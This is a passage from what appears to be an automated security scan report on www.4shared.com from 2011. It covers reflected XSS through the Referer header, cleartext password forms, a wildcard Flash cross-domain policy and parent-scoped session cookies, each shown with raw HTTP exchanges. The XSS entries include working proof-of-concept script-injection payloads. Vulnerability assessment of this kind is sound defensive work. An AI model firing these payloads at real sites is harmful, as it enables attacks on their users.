User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=c6511--><script>alert(1)</script>fe3c2ad2eba

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:26 GMT
Content-Length: 38726


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=c6511--><script>alert(1)</script>fe3c2ad2eba-->
...[SNIP]...

2.122. http://www.4shared.com/js/'%20+%20img%20+%20' [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b240e--><script>alert(1)</script>0c4c0f593d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=b240e--><script>alert(1)</script>0c4c0f593d

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:03 GMT
Content-Length: 38759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=b240e--><script>alert(1)</script>0c4c0f593d-->
...[SNIP]...

2.123. http://www.4shared.com/js/'%20+%20val%20+%20' [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload e7758--><script>alert(1)</script>6a2dcbb98ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=e7758--><script>alert(1)</script>6a2dcbb98ad

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:02 GMT
Content-Length: 38585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.google.com/search?hl=en&q=e7758--><script>alert(1)</script>6a2dcbb98ad-->
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.4shared.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT


<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div>
<form action="http://www.4shared.com/index.jsp" method="post" class="openid">

<div class="small alert" id="loginRejectReason" style="display:none;">
...[SNIP]...
<br>
<input id="passfield" name="password" type="password" class="f"
value="">
<br/>
...[SNIP]...

3.2. http://www.4shared.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT


<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div style="padding:9px;">
<form name="signUpForm" action="http://www.4shared.com/index.jsp" method="post" class="openid">
<input type="hidden" name="sId" value="f5uzfaHd0sNGJlVU" />
...[SNIP]...
<td><input type="password" name="password" id="regpassfield" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...
<td><input type="password" name="password2" id="regpassfield2" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...

3.3. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<br />
<form name="loginForm" action="/enter.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td class="alignLeft">
<input id="passfield" name="password" type="password"
class="fieldhint"
value="********"
style="width:210px" onfocus="clearPassword();" onblur="showPassword();"/>

<div class="capsWarning small red" style="display: none; width:210px">
...[SNIP]...

3.4. http://www.4shared.com/login.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...
<br />
<form name="theForm" action="/index.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td>
<input type="password" name="password" id="passfield" class="field" style="width:250px" value="" onkeydown="if (event.keyCode==13){document.theForm.submit();}"/>
<div class="capsWarning small red" style="display: none;width:250px">
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Date: Fri, 29 Jul 2011 13:56:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.4shared.com" />
<allow-access-from domain="*.4shared-china.com" />
<allow-access-from domain="*.4s.io" />
<allow-access-from domain="*.rumusic.org" />
<allow-access-from domain="*.19de9e7959fdb976322649b8.com" />
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 14 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://www.4shared.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; day1host=h; WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; hostid=263556618; __utma=210074320.358922166.1311948340.1311948340.1311948340.1; __utmb=210074320.0.10.1311948340; __utmc=210074320; __utmz=210074320.1311948340.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-217047336-1311948341109

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
ETag: W/"1150-1295256540000"
Last-Modified: Mon, 17 Jan 2011 09:29:00 GMT
Content-Length: 1150
Date: Fri, 29 Jul 2011 14:08:28 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...

5.2. http://www.4shared.com/icons/16x16/default.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /icons/16x16/default.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/16x16/default.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:57:01 GMT
ETag: W/"416-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: image/png
Content-Length: 416
Date: Fri, 29 Jul 2011 13:57:00 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx....J.@..g&...M.....KP|.....x./mR.'...".....L.....&.,....ag&;...n...i4z.^.[.e.P7.....qq.....s......8....A. Nu..t.|...<_%.
...[SNIP]...

5.3. http://www.4shared.com/images/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-720656152; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"43-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 29 Jul 2011 14:05:25 GMT

GIF89a.............!.......,...........D..;

5.4. http://www.4shared.com/js/Jsonp.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:25 GMT
ETag: W/"720-1303901808000"
Last-Modified: Wed, 27 Apr 2011 10:56:48 GMT
Content-Type: text/javascript
Content-Length: 720
Date: Fri, 29 Jul 2011 14:08:25 GMT


function Jsonp(options) {
options = $.extend(true, {
url: '',
jsonp: function() { }
}, options)

var id = Math.random()
options.url = options.url + (options.url.indexOf("?") > 0 ? '&'
...[SNIP]...

5.5. http://www.4shared.com/js/homeScript.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=00339AC45B50830C2A985D9B562FA591.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:58 GMT
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 44840
Date: Fri, 29 Jul 2011 14:09:58 GMT


var i=1;
var ua = navigator.userAgent;
var opera = /opera [56789]|opera\/[56789]/i.test(ua);
var ie = !opera && /MSIE/.test(ua);
var ie50 = ie && /MSIE 5\.[
...[SNIP]...

5.6. http://www.4shared.com/js/loginScript.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:08:22 GMT


function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

5.7. http://www.4shared.com/js/plupload/plupload.flash.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.flash.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.flash.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:26 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=1152470595; Expires=Mon, 26-Jul-2021 14:05:26 GMT; Path=/
